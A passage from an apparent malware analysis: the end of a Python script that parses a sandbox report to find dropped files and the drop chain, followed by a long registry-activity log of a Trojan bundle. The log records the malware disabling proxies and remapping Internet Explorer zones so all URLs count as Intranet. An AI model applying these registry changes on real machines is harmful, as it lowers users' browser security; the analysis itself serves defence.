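""".replace("{GAME}", GAME_MOJIBAKE)
PROCESSES = ["%original file name%.exe:1452", "1419052427l238l63518.exe&_upt=6ec6a9a21419053027:1812",
             "yx_dts.exe:1476", "OfficeAssist.0419.80.1123.exe:744", "notify.exe:2104"]

PROC_LINE = re.compile(r"^The process (?P<proc>.+) makes changes in the file system\.$")
FILE_LINE = re.compile(r"^(?P<path>.+) \((?P<size>\d+) bytes\)$")
# Assumed XP-to-current mapping; longest prefixes first so "Local Settings\..." wins.
XP_PREFIXES = [
    (r"%Documents and Settings%\%current user%\Local Settings\Application Data", "%LOCALAPPDATA%"),
    (r"%Documents and Settings%\%current user%\Local Settings\Temp", "%TEMP%"),
    (r"%Documents and Settings%\%current user%\Application Data", "%APPDATA%"),
    (r"%Documents and Settings%\All Users\Application Data", "%PROGRAMDATA%"),
    (r"%Documents and Settings%\%current user%", "%USERPROFILE%"),
]
# Scratch locations: gone, or meaningless, once the installer exits.
TRANSIENT = ("%TEMP%\\", "%USERPROFILE%\\Local Settings\\Temporary Internet Files\\")


def repair_mojibake(text, codec="gbk"):
    """Invert 'decode as UTF-8, fall back to Latin-1 per byte', then decode as GBK."""
    # Genuine CJK text (the PPT美化大师 entries) contains no U+0080..U+00FF: leave it alone.
    if not any(0x80 <= ord(c) <= 0xFF for c in text):
        return text
    raw = bytearray()
    for c in text:
        if ord(c) < 0x100:
            raw.append(ord(c))             # Latin-1 fallback: one char, one byte
        else:
            raw.extend(c.encode("utf-8"))  # a byte pair the decoder accepted as UTF-8
    try:
        return raw.decode(codec)
    except UnicodeDecodeError:
        return text                        # not GBK after all; keep the original


def normalize_path(path):
    for old, new in XP_PREFIXES:
        if path.startswith(old):
            return new + path[len(old):]
    return path


def parse_file_activity(report):
    """Yield (process, action, path, size) for every file line in the report."""
    proc = action = None
    for line in (l.strip() for l in report.splitlines()):
        m = PROC_LINE.match(line)
        if m:
            proc, action = m.group("proc"), None
            continue
        if line.startswith("The Trojan "):
            action = "delete" if "deletes" in line else "write"
            continue
        m = FILE_LINE.match(line)
        if m and proc and action:
            yield proc, action, normalize_path(repair_mojibake(m.group("path"))), int(m.group("size"))


def hunt_paths(report):
    """Paths to check on a suspect host: written, not deleted again, not scratch."""
    written, deleted = set(), set()
    for _, action, path, _ in parse_file_activity(report):
        (written if action == "write" else deleted).add(path)
    return sorted(p for p in written - deleted if not p.startswith(TRANSIENT))


def drop_chain(report, processes):
    """Map each process to the process that wrote its binary (None for the root).
    Heuristic: 'foo.exe.tmp' counts as 'foo.exe', since downloaders here write .tmp then rename."""
    writers = {}
    for proc, action, path, _ in parse_file_activity(report):
        name = path.rsplit("\\", 1)[-1].lower()
        if action == "write":
            writers.setdefault(name[:-4] if name.endswith(".tmp") else name, proc)
    return {p: writers.get(p.rsplit(":", 1)[0].lower()) for p in processes}
```

On the sample, `drop_chain` recovers the original file as the root, `1419052427l238l63518.exe&_upt=…` as the downloader that dropped both `yx_dts.exe` and `OfficeAssist.0419.80.1123.exe`, and `OfficeAssist` as the parent of `notify.exe`; `hunt_paths` keeps the `dts.exe` and `notify.exe` drops, the desktop shortcut with its name decoded, and the scheduled-task `.job`, while the NSIS plugin DLL under `nsw44.tmp` drops out because the installer deleted it again. Feed the full report text in place of the sample to get the complete list.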

Registry activity

The process yx_dts.exe:1476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\大天使之剑]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\dts\mydts\uninst.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\大天使之剑]
"URLInfoAbout" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\大天使之剑]
"DisplayVersion" = "3.1.0.0"
"Publisher" = "大天使之剑"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\大天使之剑]
"DisplayName" = "大天使之剑"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\大天使之剑]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\dts\mydts\dts.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 99 50 CC B8 CB D3 3C 05 16 D9 31 F4 52 6C 41"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

The process MM-liao8398.exe:824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122020141221]
"CacheOptions" = "11"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122020141221]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014122020141221\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\9158ktv\DownLoad]
"9158chat2_ktv083_98.exe" = "9158chat2_ktv083_98"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122020141221]
"CacheLimit" = "8192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "MM-liao8398.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122020141221]
"CacheRepair" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\QuanQuan]
"LastTime" = "Type: REG_QWORD, Length: 8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 19 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1413899698"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 E8 6B FF E9 5E C7 46 CA A3 F0 95 F2 A6 F6 F2"

[HKLM\SOFTWARE\QuanQuan]
"RunCount" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014122020141221]
"CachePrefix" = ":2014122020141221:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots that do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013041720130418]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "77 61 03 27 91 D4 87 08 8F D0 65 E9 A4 53 D3 B0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots that do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process notify.exe:2104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\PPTAssist\Common\minisite]
"Address" = "ZmlsZTovLy8lYXBwcm9vdCVcbWluaXNpdGVcMS4wXGluZGV4Lmh0bWw="

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\PPTAssist\Common\minisite]
"timebucket" = "11:40:00-14:00:00,17:20:00-20:00:00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\PPTAssist\Common\updateinfo]
"notifysettingetag" = "7139DDC4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\PPTAssist\Common\minisite]
"idleContinueSecond" = "240"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\PPTAssist\Common\minisite]
"switch" = "3"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\PPTAssist\Common\updateinfo]
"LastNotifyTime" = "2014-12-20 02:06:01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 8F 8B DD D8 B7 00 AD B7 AF B7 4D ED 37 0F 60"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\PPTAssist\Common\updateinfo]
"LastKsoActive" = "2014-12-20 02:06:14"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots that do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 9158chat2_ktv083_98.exe:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\9158Service]
"IsGuest" = "1"

[HKLM\SOFTWARE\9158web]
"StartTime" = "12200205"

[HKLM\SOFTWARE\9158Service]
"TopLevel" = "1"
"Open" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\9158web]
"MainRun" = "d:\Program Files\9158KTV\9158.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\9158Service]
"LastPlat" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158多人视频]
"DisplayVersion" = "6.800"
"DisplayName" = "9158多人视频"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\9158Service]
"PlatName" = "9158多人视频"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\MozillaPlugins\@9158.com/nplogin]
"Path" = "d:\Program Files\9158KTV\nplogin.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 39 3E D3 F3 BC 60 64 40 BE D6 DD 2F FF EA 08"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158多人视频]
"UninstallString" = "d:\Program Files\9158KTV\Uninst.exe"
"Publisher" = "天格科技（杭州）有限公司"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158多人视频]
"URLInfoAbout" = "http://www.9158.com/"

The process assistupdate.exe:2080 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 E4 04 70 F5 F4 A5 52 A4 52 43 B8 76 1E A2 1E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process dts.exe:1940 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 D1 B0 B4 A5 07 55 FF 8A 3C B5 8F 6B E8 79 72"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots that do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process dts.exe:1728 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "42 27 A4 56 D5 0B BD EF 0C 01 85 38 9E 40 7D 22"

The process dts.exe:1772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
